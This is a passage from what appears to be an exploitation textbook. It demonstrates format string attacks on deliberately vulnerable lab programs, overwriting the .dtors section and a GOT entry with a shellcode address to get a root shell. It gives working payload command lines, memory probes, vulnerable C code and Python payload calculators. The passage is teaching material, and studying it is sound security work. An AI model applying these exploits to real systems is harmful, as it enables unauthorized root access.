CONTENTS, ALLOC, LOAD, READONLY, DATA

2 .hash 0000002c 08048148 08048148 00000148 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

3 .dynsym 00000060 08048174 08048174 00000174 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

4 .dynstr 00000051 080481d4 080481d4 000001d4 2**0

CONTENTS, ALLOC, LOAD, READONLY, DATA

5 .gnu.version 0000000c 08048226 08048226 00000226 2**1

CONTENTS, ALLOC, LOAD, READONLY, DATA

6 .gnu.version_r 00000020 08048234 08048234 00000234 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

7 .rel.dyn 00000008 08048254 08048254 00000254 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

8 .rel.plt 00000020 0804825c 0804825c 0000025c 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

9 .init 00000017 0804827c 0804827c 0000027c 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

10 .plt 00000050 08048294 08048294 00000294 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

11 .text 000001c0 080482f0 080482f0 000002f0 2**4

CONTENTS, ALLOC, LOAD, READONLY, CODE

12 .fini 0000001c 080484b0 080484b0 000004b0 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

13 .rodata 000000bf 080484e0 080484e0 000004e0 2**5

CONTENTS, ALLOC, LOAD, READONLY, DATA

14 .eh_frame 00000004 080485a0 080485a0 000005a0 2**2

CONTENTS, ALLOC, LOAD, READONLY, DATA

15 .ctors 00000008 080495a4 080495a4 000005a4 2**2

CONTENTS, ALLOC, LOAD, DATA

16 .dtors 0000000c 080495ac 080495ac 000005ac 2**2

CONTENTS, ALLOC, LOAD, DATA

17 .jcr 00000004 080495b8 080495b8 000005b8 2**2

CONTENTS, ALLOC, LOAD, DATA

18 .dynamic 000000c8 080495bc 080495bc 000005bc 2**2

CONTENTS, ALLOC, LOAD, DATA

19 .got 00000004 08049684 08049684 00000684 2**2

CONTENTS, ALLOC, LOAD, DATA

20 .got.plt 0000001c 08049688 08049688 00000688 2**2

CONTENTS, ALLOC, LOAD, DATA

21 .data 0000000c 080496a4 080496a4 000006a4 2**2

CONTENTS, ALLOC, LOAD, DATA

22 .bss 00000004 080496b0 080496b0 000006b0 2**2

ALLOC

23 .comment 0000012f 00000000 00000000 000006b0 2**0

CONTENTS, READONLY

24 .debug_aranges 00000058 00000000 00000000 000007e0 2**3

CONTENTS, READONLY, DEBUGGING

25 .debug_pubnames 00000025 00000000 00000000 00000838 2**0

CONTENTS, READONLY, DEBUGGING

26 .debug_info 000001ad 00000000 00000000 0000085d 2**0

CONTENTS, READONLY, DEBUGGING

27 .debug_abbrev 00000066 00000000 00000000 00000a0a 2**0

CONTENTS, READONLY, DEBUGGING

28 .debug_line 0000013d 00000000 00000000 00000a70 2**0

CONTENTS, READONLY, DEBUGGING

29 .debug_str 000000bb 00000000 00000000 00000bad 2**0

CONTENTS, READONLY, DEBUGGING

30 .debug_ranges 00000048 00000000 00000000 00000c68 2**3

CONTENTS, READONLY, DEBUGGING

reader@hacking:~/booksrc $

Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format string program, fmt_vuln.c, must have a .dtors section containing nothing. This can be inspected using nm and objdump.

reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR

08049694 d __DTOR_END__

08049690 d __DTOR_LIST__

reader@hacking:~/booksrc $ objdump -s -j .dtors ./fmt_vuln

./fmt_vuln: file format elf32-i386

Contents of section .dtors:

8049690 ffffffff 00000000 ........

reader@hacking:~/booksrc $

As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is only four bytes this time, which means there are no addresses between them. The object dump verifies this.

Since the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. This will be the address of __DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the address of __DTOR_END__ in this case).

If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln

SHELLCODE will be at 0xbffff9ec

reader@hacking:~/booksrc $

Shellcode can be put into an environment variable, and the address can be predicted as usual. Since the program name lengths of the helper program getenvaddr.c and the vulnerable fmt_vuln.c program differ by two bytes, the shellcode will be located at 0xbffff9ec when fmt_vuln.c is executed. This address simply has to be written into the .dtors section at 0x08049694 using the format string vulnerability. In the output below, the short write method is used.

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xf9ec - 0xbfff

$2 = 14829

(gdb) quit

reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR

08049694 d __DTOR_END__

08049690 d __DTOR_LIST__

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\x08")%49143x%4\$hn%14829x%5\$hn

The right way to print user-controlled input:

????%49143x%4$hn%14829x%5$hn

The wrong way to print user-controlled input:

????

b7fe75fc

[*] test_val @ 0x08049794 = -72 0xffffffb8

sh-3.2# whoami

root

sh-3.2#

Even though the .dtors section isn't properly terminated with a NULL address of 0x00000000, the shellcode address is still considered to be a destructor function. When the program exits, the shellcode will be called, spawning a root shell.

Another notesearch Vulnerability

In addition to the buffer overflow vulnerability, the notesearch program from Chapter 0x200 also suffers from a format string vulnerability. This vulnerability is the printf(note_buffer) call in the code listing below.

int print_notes(int fd, int uid, char *searchstring) {

int note_length;

char byte=0, note_buffer[100];

note_length = find_user_note(fd, uid);

if(note_length == -1) // If end of file reached,

return 0; // return 0.

read(fd, note_buffer, note_length); // Read note data.

note_buffer[note_length] = 0; // Terminate the string.

if(search_note(note_buffer, searchstring)) // If searchstring found,

printf(note_buffer); // print the note.

return 1;

}

This function reads the note_buffer from the file and prints the contents of the note without supplying its own format string. While this buffer can't be directly controlled from the command line, the vulnerability can be exploited by sending exactly the right data to the file using the notetaker program and then opening that note using the notesearch program. In the following output, the notetaker program is used to create notes to probe memory in the notesearch program. This tells us that the eighth function parameter is at the beginning of the buffer.

reader@hacking:~/booksrc $ ./notetaker AAAA$(perl -e 'print "%x."x10')

[DEBUG] buffer @ 0x804a008: 'AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ ./notesearch AAAA

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

AAAAbffff750.23.20435455.37303032.0.0.1.41414141.252e7825.78252e78 .

-------[ end of note data ]-------

reader@hacking:~/booksrc $ ./notetaker BBBB%8\$x

[DEBUG] buffer @ 0x804a008: 'BBBB%8$x'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ ./notesearch BBBB

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

BBBB42424242

-------[ end of note data ]-------

reader@hacking:~/booksrc $

Now that the relative layout of memory is known, exploitation is just a matter of overwriting the .dtors section with the address of injected shellcode.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff9e8

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xf9e8 - 0xbfff

$2 = 14825

(gdb) quit

reader@hacking:~/booksrc $ nm ./notesearch | grep DTOR

08049c60 d __DTOR_END__

08049c5c d __DTOR_LIST__

reader@hacking:~/booksrc $ ./notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\x08")%49143x%8\$hn%14825x%9\$hn

[DEBUG] buffer @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'

[DEBUG] datafile @ 0x804a070: '/var/notes'

[DEBUG] file descriptor is 3

Note has been saved.

reader@hacking:~/booksrc $ ./notesearch 49143x

[DEBUG] found a 34 byte note for user id 999

[DEBUG] found a 41 byte note for user id 999

[DEBUG] found a 5 byte note for user id 999

[DEBUG] found a 35 byte note for user id 999

[DEBUG] found a 9 byte note for user id 999

[DEBUG] found a 33 byte note for user id 999

21

-------[ end of note data ]-------

sh-3.2# whoami

root

sh-3.2#
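The field widths computed in gdb above follow a fixed pattern, which the Python sketch below reproduces. It is an illustration only: the function name short_write_format is hypothetical, and it assumes that the high half of the value is written first, that both widths come out to at least 8 so each %x prints exactly that many characters, and that nothing else is printed before the addresses within the same printf() call.

```python
import struct


def short_write_format(target: int, value: int, first_param: int) -> bytes:
    """Build a two-%hn format string that stores a 32-bit value at target."""
    high, low = value >> 16, value & 0xFFFF
    # The two 4-byte addresses are printed first and count toward the total.
    addresses = struct.pack("<II", target + 2, target)
    pad_high = high - len(addresses)
    pad_low = low - high
    if pad_high < 8 or pad_low < 8:
        raise ValueError("this sketch needs both field widths to be >= 8")
    fmt = "%{}x%{}$hn%{}x%{}$hn".format(
        pad_high, first_param, pad_low, first_param + 1
    )
    return addresses + fmt.encode("ascii")


# Values from the session above: the 0x08049c60 target, shellcode at 0xbffff9e8.
payload = short_write_format(0x08049C60, 0xBFFFF9E8, 8)
print(payload)
```

When the resulting string is typed on a command line, each $ still has to be escaped as \$, as in the session above.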

Overwriting the Global Offset Table

Since a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose—the procedure linkage table (PLT).

This section consists of many jump instructions, each one corresponding to the address of a function. It works like a springboard—each time a shared function needs to be called, control will pass through the PLT.

An object dump disassembling the PLT section in the vulnerable format string program (fmt_vuln.c) shows these jump instructions:

reader@hacking:~/booksrc $ objdump -d -j .plt ./fmt_vuln

./fmt_vuln: file format elf32-i386

Disassembly of section .plt:

080482b8 <__gmon_start__@plt-0x10>:

80482b8: ff 35 6c 97 04 08 pushl 0x804976c

80482be: ff 25 70 97 04 08 jmp *0x8049770

80482c4: 00 00 add %al,(%eax)

...

080482c8 <__gmon_start__@plt>:

80482c8: ff 25 74 97 04 08 jmp *0x8049774

80482ce: 68 00 00 00 00 push $0x0

80482d3: e9 e0 ff ff ff jmp 80482b8 <_init+0x18>

080482d8 <__libc_start_main@plt>:

80482d8: ff 25 78 97 04 08 jmp *0x8049778

80482de: 68 08 00 00 00 push $0x8

80482e3: e9 d0 ff ff ff jmp 80482b8 <_init+0x18>

080482e8 <strcpy@plt>:

80482e8: ff 25 7c 97 04 08 jmp *0x804977c

80482ee: 68 10 00 00 00 push $0x10

80482f3: e9 c0 ff ff ff jmp 80482b8 <_init+0x18>

080482f8 <printf@plt>:

80482f8: ff 25 80 97 04 08 jmp *0x8049780

80482fe: 68 18 00 00 00 push $0x18

8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>

08048308 <exit@plt>:

8048308: ff 25 84 97 04 08 jmp *0x8049784

804830e: 68 20 00 00 00 push $0x20

8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>

reader@hacking:~/booksrc $

One of these jump instructions is associated with the exit() function, which is called at the end of the program. If the jump instruction used for the exit() function can be manipulated to direct the execution flow into shellcode instead of the exit() function, a root shell will be spawned. Below, the procedure linkage table is shown to be read-only.

reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "

10 .plt 00000060 080482b8 080482b8 000002b8 2**2

CONTENTS, ALLOC, LOAD, READONLY, CODE

But closer examination of the jump instructions (the first instruction of each entry, repeated below) reveals that they aren't jumping to addresses but to pointers to addresses. For example, the actual address of the printf() function is stored as a pointer at the memory address 0x08049780, and the exit() function's address is stored at 0x08049784.

080482f8 <printf@plt>:

80482f8: ff 25 80 97 04 08 jmp *0x8049780

80482fe: 68 18 00 00 00 push $0x18

8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>

08048308 <exit@plt>:

8048308: ff 25 84 97 04 08 jmp *0x8049784

804830e: 68 20 00 00 00 push $0x20

8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
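The pointer address can be read straight out of the instruction bytes: ff 25 is the opcode for an indirect jump through an absolute 32-bit address, and the four bytes that follow hold that address in little-endian order. A small Python sketch of the decoding, with the hypothetical helper name decode_plt_jmp:

```python
import struct


def decode_plt_jmp(code: bytes) -> int:
    """Return the absolute pointer address used by an `ff 25` indirect jmp."""
    if code[:2] != b"\xff\x25":
        raise ValueError("not a jmp *disp32 instruction")
    # The four bytes after the opcode hold the address in little-endian order.
    (pointer,) = struct.unpack_from("<I", code, 2)
    return pointer


printf_stub = bytes.fromhex("ff 25 80 97 04 08")
exit_stub = bytes.fromhex("ff 25 84 97 04 08")
print(hex(decode_plt_jmp(printf_stub)))  # 0x8049780
print(hex(decode_plt_jmp(exit_stub)))    # 0x8049784
```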

These addresses exist in another section, called the global offset table (GOT), which is writable. These addresses can be directly obtained by displaying the dynamic relocation entries for the binary by using objdump.

reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln: file format elf32-i386

DYNAMIC RELOCATION RECORDS

OFFSET TYPE VALUE

08049764 R_386_GLOB_DAT __gmon_start__

08049774 R_386_JUMP_SLOT __gmon_start__

08049778 R_386_JUMP_SLOT __libc_start_main

0804977c R_386_JUMP_SLOT strcpy

08049780 R_386_JUMP_SLOT printf

08049784 R_386_JUMP_SLOT exit

reader@hacking:~/booksrc $

This reveals that the address of the exit() function (the last entry above) is located in the GOT at 0x08049784. If the value at this location is overwritten with the address of the shellcode, the program should call the shellcode when it thinks it's calling the exit() function.
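The effect of redirecting a call through a writable table can be pictured with a toy model in Python. This is only an analogy under loud assumptions: the dictionary stands in for the GOT, the functions real_exit and shellcode are hypothetical placeholders, and details of real dynamic linking (such as how the slot is first filled in) are ignored.

```python
def real_exit() -> str:
    return "process exits normally"


def shellcode() -> str:
    return "shellcode runs instead"


# Toy stand-in for the writable GOT: slot address -> current target.
got = {0x08049784: real_exit}


def exit_plt() -> str:
    """Toy stand-in for exit@plt: jump through whatever the slot holds."""
    return got[0x08049784]()


before = exit_plt()
got[0x08049784] = shellcode  # the overwrite the format string performs
after = exit_plt()
print(before)
print(after)
```

The calling code never changes; only the table entry does, which is why a read-only PLT offers no protection here.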

As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before, meaning that the only things that need adjustment are the first 16 bytes of the format string. The calculations for the %x format parameters will be done once again for clarity. In the output below, the address of the shellcode (0xbffff9ec) is written over the address of the exit() function (stored at 0x08049784).

reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln

SHELLCODE will be at 0xbffff9ec

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xbfff - 8

$1 = 49143

(gdb) p 0xf9ec - 0xbfff

$2 = 14829

(gdb) quit

reader@hacking:~/booksrc $ objdump -R ./fmt_vuln

./fmt_vuln: file format elf32-i386

DYNAMIC RELOCATION RECORDS

OFFSET TYPE VALUE

08049764 R_386_GLOB_DAT __gmon_start__

08049774 R_386_JUMP_SLOT __gmon_start__

08049778 R_386_JUMP_SLOT __libc_start_main

0804977c R_386_JUMP_SLOT strcpy

08049780 R_386_JUMP_SLOT printf

08049784 R_386_JUMP_SLOT exit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\x08")%49143x%4\$hn%14829x%5\$hn

The right way to print user-controlled input:

????%49143x%4$hn%14829x%5$hn

The wrong way to print user-controlled input:

????

b7fe75fc

[*] test_val @ 0x08049794 = -72 0xffffffb8

sh-3.2# whoami

root

sh-3.2#
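The two short writes in the session above can be replayed on a toy memory buffer to confirm that they assemble the intended pointer. This Python sketch is a simulation, not the exploit itself; the BASE window and the write_short helper are hypothetical, and it assumes the byte count starts at zero for the vulnerable printf() call.

```python
import struct

BASE = 0x08049780  # toy memory window that covers the exit() slot
memory = bytearray(8)


def write_short(address: int, value: int) -> None:
    """Mimic %hn: store the low 16 bits of the running byte count."""
    struct.pack_into("<H", memory, address - BASE, value & 0xFFFF)


printed = 8                       # the two 4-byte addresses
printed += 49143                  # %49143x
write_short(0x08049786, printed)  # %4$hn stores 0xbfff in the high half
printed += 14829                  # %14829x
write_short(0x08049784, printed)  # %5$hn stores 0xf9ec in the low half

(slot,) = struct.unpack_from("<I", memory, 0x08049784 - BASE)
print(hex(slot))  # 0xbffff9ec
```

Because x86 is little-endian, the half written at the higher address (0x08049786) becomes the upper 16 bits of the 4-byte pointer.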

When fmt_vuln.c tries to call the exit() function, the address of the exit() function is looked up in the GOT and is jumped to via the PLT. Since the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.

Another advantage of overwriting the GOT is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.

The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.